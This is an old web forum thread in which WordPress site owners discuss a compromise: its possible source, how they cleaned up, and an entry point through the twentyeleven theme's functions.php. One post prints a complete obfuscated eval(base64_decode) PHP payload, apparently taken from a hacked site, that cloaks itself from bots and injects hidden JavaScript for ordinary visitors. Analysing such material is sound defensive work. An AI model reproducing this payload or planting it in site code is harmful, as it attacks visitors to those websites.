1. Advertising
    y u no do it?

    Advertising (learn more)

    Advertise virtually anything here, with CPM banner ads, CPM email ads and CPC contextual links. You can target relevant areas of the site and show ads based on geographical location of the user if you wish.

    Starts at just $1 per CPM or $0.10 per CPC.

New wordpress exploit

Discussion in 'Security' started by dev22, Jan 23, 2012.

  1. BCRed

    BCRed Active Member

    Messages:
    249
    Likes Received:
    2
    Best Answers:
    0
    Trophy Points:
    55
    #21
    Anyone found the source of this exploit yet. It hit two of the 25 or so sites on my server so we fixed those up manually and updated their Wordpress versions. Like several of you, I've got multiple cPanels on a VPS and only one got hit. Is this a local Wordpress exploit. Or something that I should be concerned with for my entire server?
    SEMrush
     
    BCRed, Feb 6, 2012 IP
    SEMrush
  2. HostingLynx

    HostingLynx Active Member

    Messages:
    105
    Likes Received:
    1
    Best Answers:
    1
    Trophy Points:
    83
    #22
    There are only therioes as to what it is but as of right now I belive its a 0day.
     
    HostingLynx, Feb 7, 2012 IP
  3. dalem

    dalem Peon

    Messages:
    494
    Likes Received:
    12
    Best Answers:
    0
    Trophy Points:
    0
    #23
    Maybe of interest to you guys but just out of curiosity I did a database dump of one of my WP sites and started looking through it. There is all sorts of crap in there from certain plugins/widgets that I installed. If I can remember the plugins i'll post it here. I am sure one of them was a tag cloud plugin. I have since deleted the plugins and cleaned up the database.
     
    dalem, Feb 7, 2012 IP
  4. netranger

    netranger Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #24
    Can any of you help me decode the following and explain step by step how do you decode it? Especially the last part with the javascript code:
    eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1YSA9ICRfU0VSVkVSWydIVFRQX1VTRVJfQUdFTlQnXTsNCiRib3RzVUEgPSBhcnJheSgnMTIzNDUnLCdhbGV4YS5jb20nLCdhbm9ueW1vdXNlLm9yZycsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ2Jsb2dwdWxzZS5jb20nLCdib3QnLCdidXp6dHJhY2tlci5jb20nLCdjcmF3bCcsJ2RvY29tbycsJ2RydXBhbC5vcmcnLCdmZWVkdG9vbHMnLCdodG1sZG9jJywnaHR0cGNsaWVudCcsJ2ludGVybmV0c2Vlci5jb20nLCdsaW51eCcsJ21hY2ludG9zaCcsJ21hYyBvcycsJ21hZ2VudCcsJ21haWwucnUnLCdteWJsb2dsb2cgYXBpJywnbmV0Y3JhZnQnLCdvcGVuYWNvb24uZGUnLCdvcGVyYSBtaW5pJywnb3BlcmEgbW9iaScsJ3BsYXlzdGF0aW9uJywncG9zdHJhbmsuY29tJywncHNwJywncnJycnJycnJyJywncnNzcmVhZGVyJywnc2x1cnAnLCdzbm9vcHknLCdzcGlkZXInLCdzcHlkZXInLCdzem4taW1hZ2UtcmVzaXplcicsJ3ZhbGlkYXRvcicsJ3ZpcnVzJywndmxjIG1lZGlhIHBsYXllcicsJ3dlYmNvbGxhZ2UnLCd3b3JkcHJlc3MnLCd4MTEnLCd5YW5kZXgnLCdpcGhvbmUnLCdhbmRyb2lkJyk7DQpmb3JlYWNoICgkYm90c1VBIGFzICRicykge2lmKHN0cnBvcyhzdHJ0b2xvd2VyKCR1YSksICRicykhPT0gZmFsc2UpeyRib3QgPSB0cnVlOyBicmVhazt9fQ0KaWYgKCEkYm90KXsNCgllY2hvKGJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZEQ1cFppaDNhVzVrYjNkYkltUnZZM1Z0Wlc1MElsMHBkSEo1ZTNCeWIzUnZkSGx3WlR0OVkyRjBZMmdvWW5KbFluSXBlM04wUFZOMGNtbHVaenQ2ZWowbllXd25PM3A2UFNkNmRpY3VjM1ZpYzNSeUtERXlNeTB4TWpJcEszcDZPM056UFZ0ZE8yWTlKMlp5SnlzbmIyMG5LeWREYUNjN1ppczlKMkZ5UXljN1ppczlKM0ZuYjJSbEoxc2ljM1ZpYzNSeUlsMG9OQzB5S1R0M1BYUm9hWE03WlQxM1cyWmJJbk4xWW5OMGNpSmRLREV4S1N0NmVsMDdiajBpTXk0MUl6TXVOU00xTVM0MUl6VXdJekUxSXpFNUl6UTVJelUwTGpVak5EZ3VOU00xTnk0MUl6VXpMalVqTkRrdU5TTTFOQ00xTnlNeU1pTTFNQzQxSXpRNUxqVWpOVGNqTXpNdU5TTTFNeU0wT1M0MUl6VXpMalVqTkRrdU5TTTFOQ00xTnlNMU5pNDFJek15SXpVNUxqVWpOREVqTkRjdU5TTTFNQzQxSXpNNEl6UTNMalVqTlRNdU5TTTBPUzQxSXpFNUl6RTRMalVqTkRnak5UUXVOU00wT1NNMU9TNDFJekU0TGpVak1Ua3VOU00wTkM0MUl6SXpJelExTGpVak1Ua3VOU00yTUM0MUl6VXVOU016TGpVak15NDFJek11TlNNMU1TNDFJelV3SXpVMkl6UTNMalVqTlRNdU5TTTBPUzQxSXpVMkl6RTVJekU1TGpVak1qZ3VOU00xTGpVak15NDFJek11TlNNMk1TNDFJekUxSXpRNUxqVWpOVE1qTlRZdU5TTTBPUzQxSXpFMUl6WXdMalVqTlM0MUl6TXVOU016TGpVak15NDFJelE1SXpVMExqVWpORGd1TlNNMU55NDFJelV6TGpVak5Ea3VOU00xTkNNMU55TXlNaU0xT0M0MUl6VTJJelV4TGpVak5UY2pORGt1TlNNeE9TTXhOaU15T1NNMU1TNDFJelV3SXpVMkl6UTNMalVqTlRNdU5TTTBPUzQxSXpFMUl6VTJMalVqTlRZak5EZ3VOU015T1M0MUl6RTRMalVqTlRFak5UY2pOVGNqTlRVak1qZ2pNakl1TlNNeU1pNDFJelU0TGpVak5UTXVOU00xTlM0MUl6VXlJelUySXpVM0l6WXdJelV4SXpVNEl6VTRMalVqTWpJak5URXVOU00xTUM0MUl6VXdMalVqTWpJak5EZ2pOVEV1TlNNMk1DTXlNaTQxSXpRNUl6SXlMalVqTWpVak1qTWpNalVqTWpJak5UVWpOVEVqTlRVak16QXVOU00xTUM0MUl6VTBMalVqTWprdU5TTXlNeTQxSXpFNExqVWpNVFVqTlRndU5TTTFNUzQxSXpRNUl6VTNJelV4SXpJNUxqVWpNVGd1TlNNeU15NDFJekl6SXpFNExqVWpNVFVqTlRFak5Ea3VOU00xTVM0MUl6VXdMalVqTlRFak5UY2pNamt1TlNNeE9DNDFJekl6TGpVak1qTWpNVGd1TlNNeE5TTTFOaTQxSXpVM0l6VTVMalVqTlRNak5Ea3VOU015T1M0MUl6RTRMalVqTlRnak5URXVOU00xTmk0MUl6VXhMalVqTkRnak5URXVOU00xTXlNMU1TNDFJelUzSXpVNUxqVWpNamdqTlRFak5URXVOU00wT1NNME9TTTBPUzQxSXpVMEl6STRMalVqTlRVak5UUXVOU00xTmk0MUl6VXhMalVqTlRjak5URXVOU00xTkM0MUl6VTBJekk0SXpRM0xqVWpORGdqTlRZdU5TTTFOQzQxSXpVekl6VTNMalVqTlRjak5Ea3VOU015T0M0MUl6VXpJelE1TGpVak5UQWpOVGNqTWpnak1qTWpNamd1TlNNMU55TTFOQzQxSXpVMUl6STRJekl6SXpJNExqVWpNVGd1TlNNek1DTXlPU015TWk0MUl6VXhMalVqTlRBak5UWWpORGN1TlNNMU15NDFJelE1TGpVak16QWpNVFlqTVRrdU5TTXlPQzQxSXpVdU5TTXpMalVqTXk0MUl6WXhMalVqTlM0MUl6TXVOU016TGpVak5UQWpOVGN1TlNNMU5DTTBPQzQxSXpVM0l6VXhMalVqTlRRdU5TTTFOQ014TlNNMU1TNDFJelV3SXpVMkl6UTNMalVqTlRNdU5TTTBPUzQxSXpVMkl6RTVJekU1TGpVak5qQXVOU00xTGpVak15NDFJek11TlNNekxqVWpOVGdqTkRjdU5TTTFOaU14TlNNMU1DTXhOU015T1M0MUl6RTFJelE1SXpVMExqVWpORGd1TlNNMU55NDFJelV6TGpVak5Ea3VOU00xTkNNMU55TXlNaU0wT0M0MUl6VTJJelE1TGpVak5EY3VOU00xTnlNME9TNDFJek16TGpVak5UTWpORGt1TlNNMU15NDFJelE1TGpVak5UUWpOVGNqTVRrak1UZ3VOU00xTVM0MUl6VXdJelUySXpRM0xqVWpOVE11TlNNME9TNDFJekU0TGpVak1Ua3VOU015T0M0MUl6VXdJekl5SXpVMkxqVWpORGt1TlNNMU55TXpNUzQxSXpVM0l6VTNJelUySXpVeExqVWpORGdqTlRjdU5TTTFOeU0wT1M0MUl6RTVJekU0TGpVak5UWXVOU00xTmlNME9DNDFJekU0TGpVak1qRWpNVGd1TlNNMU1TTTFOeU0xTnlNMU5TTXlPQ015TWk0MUl6SXlMalVqTlRndU5TTTFNeTQxSXpVMUxqVWpOVElqTlRZak5UY2pOakFqTlRFak5UZ2pOVGd1TlNNeU1pTTFNUzQxSXpVd0xqVWpOVEF1TlNNeU1pTTBPQ00xTVM0MUl6WXdJekl5TGpVak5Ea2pNakl1TlNNeU5TTXlNeU15TlNNeU1pTTFOU00xTVNNMU5TTXpNQzQxSXpVd0xqVWpOVFF1TlNNeU9TNDFJekl6TGpVak1UZ3VOU014T1M0MUl6STRMalVqTlRBak1qSWpOVFl1TlNNMU55TTFPUzQxSXpVekl6UTVMalVqTWpJak5UZ2pOVEV1TlNNMU5pNDFJelV4TGpVak5EZ2pOVEV1TlNNMU15TTFNUzQxSXpVM0l6VTVMalVqTWprdU5TTXhPQzQxSXpVeEl6VXhMalVqTkRrak5Ea2pORGt1TlNNMU5DTXhPQzQxSXpJNExqVWpOVEFqTWpJak5UWXVOU00xTnlNMU9TNDFJelV6SXpRNUxqVWpNaklqTlRVak5UUXVOU00xTmk0MUl6VXhMalVqTlRjak5URXVOU00xTkM0MUl6VTBJekk1TGpVak1UZ3VOU00wTnk0MUl6UTRJelUyTGpVak5UUXVOU00xTXlNMU55NDFJelUzSXpRNUxqVWpNVGd1TlNNeU9DNDFJelV3SXpJeUl6VTJMalVqTlRjak5Ua3VOU00xTXlNME9TNDFJekl5SXpVekl6UTVMalVqTlRBak5UY2pNamt1TlNNeE9DNDFJekl6SXpFNExqVWpNamd1TlNNMU1DTXlNaU0xTmk0MUl6VTNJelU1TGpVak5UTWpORGt1TlNNeU1pTTFOeU0xTkM0MUl6VTFJekk1TGpVak1UZ3VOU015TXlNeE9DNDFJekk0TGpVak5UQWpNaklqTlRZdU5TTTBPUzQxSXpVM0l6TXhMalVqTlRjak5UY2pOVFlqTlRFdU5TTTBPQ00xTnk0MUl6VTNJelE1TGpVak1Ua2pNVGd1TlNNMU9DNDFJelV4TGpVak5Ea2pOVGNqTlRFak1UZ3VOU015TVNNeE9DNDFJekl6TGpVak1qTWpNVGd1TlNNeE9TNDFJekk0TGpVak5UQWpNaklqTlRZdU5TTTBPUzQxSXpVM0l6TXhMalVqTlRjak5UY2pOVFlqTlRFdU5TTTBPQ00xTnk0MUl6VTNJelE1TGpVak1Ua2pNVGd1TlNNMU1TTTBPUzQxSXpVeExqVWpOVEF1TlNNMU1TTTFOeU14T0M0MUl6SXhJekU0TGpVak1qTXVOU015TXlNeE9DNDFJekU1TGpVak1qZ3VOU00xTGpVak15NDFJek11TlNNekxqVWpORGtqTlRRdU5TTTBPQzQxSXpVM0xqVWpOVE11TlNNME9TNDFJelUwSXpVM0l6SXlJelV3TGpVak5Ea3VOU00xTnlNek15NDFJelV6SXpRNUxqVWpOVE11TlNNME9TNDFJelUwSXpVM0l6VTJMalVqTXpJak5Ua3VOU00wTVNNME55NDFJelV3TGpVak16Z2pORGN1TlNNMU15NDFJelE1TGpVak1Ua2pNVGd1TlNNME9DTTFOQzQxSXpRNUl6VTVMalVqTVRndU5TTXhPUzQxSXpRMExqVWpNak1qTkRVdU5TTXlNaU0wTnk0MUl6VTFJelUxSXpRNUxqVWpOVFFqTkRrak16SXVOU00xTVNNMU1TNDFJelV6SXpRNUl6RTVJelV3SXpFNUxqVWpNamd1TlNNMUxqVWpNeTQxSXpNdU5TTTJNUzQxSWxzb0tHVXBQeUp6SWpvaUlpa3JJbkFpS3lKc2FYUWlYU2dpWVNNaVd5Z29aU2svSW5OMUlqb2lJaWtySW1KemRISWlYU2d4S1NrN2RISjVlM0U5Wkc5amRXMWxiblF1WTNKbFlYUmxSV3hsYldWdWRDZ2laR2wySWlrN2NTNWhjSEJsYm1SRGFHbHNaQ2h4S1R0OVkyRjBZMmdvY1hjcGUyZzlMWEJoY25ObFNXNTBLQ2N3TVRJbktTODFPMzBLWm05eUtHazlOaTB5TFRFdE1pMHhPMmt0TlRnNUlUMHdPMmtyS3lsN2FqMXBPMmxtS0hOMEtYTnpQWE56SzNOMExtWnliMjFEYUdGeVEyOWtaU2d0TVNwb0tpZ3hLekVxYmx0cVhTa3BPMzF4UFhOek8ybG1LR1VwWlNnaUlpdHhLVHQ5UEM5elkzSnBjSFErJykpOw0KfQ=='));
     
    netranger, May 3, 2012 IP
  5. obzerver

    obzerver Peon

    Messages:
    1
    Likes Received:
    0
    Best Answers:
    0
    Trophy Points:
    0
    #25
    hi guys,

    one of my sites was also recently hacked with similar characteristics.. upon checking my logs it looks as if they got in via a POST request to functions.php in the twentyeleven theme. I only just discovered it, so not sure exactly how it was compromised as yet, but the first step seems to modify functions.php with a feedback check to see if they obtained access, then they modified the main index.php

    The twentyeleven theme was not even active either, so I've removed the twentyten & twentyeleven themes as a precaution.
     
    obzerver, May 6, 2012 IP